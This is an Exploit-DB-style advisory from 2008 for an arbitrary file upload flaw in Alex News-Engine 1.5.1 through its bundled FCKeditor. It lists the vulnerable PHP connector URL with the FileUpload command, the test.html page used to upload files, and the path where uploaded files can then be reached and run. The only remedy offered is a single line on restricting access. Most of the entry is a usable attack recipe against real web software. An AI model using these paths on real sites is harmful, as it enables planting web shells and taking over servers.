Alex News-Engine 1.5.1 Remote Arbitrary File Upload Vulnerability



EDB-ID: 7157 CVE: N/AOSVDB-ID: 50034
Author: BatterPublished: 2008-11-19Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
########################################################################
#
#                        Yellow Flood Organization
#
# Alex News-engine (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/news-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/news-engine/
#
# Discover by: Batter
#
########################################################################
####################
- Vulnerability:
####################
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/
####################
- Exploit:
####################
http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
####################
- how To use:
####################
http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- Greets :
####################
THE.HACKER.ONE , Str0ke
####################
# milw0rm.com [2008-11-19]






Comments

No comments so far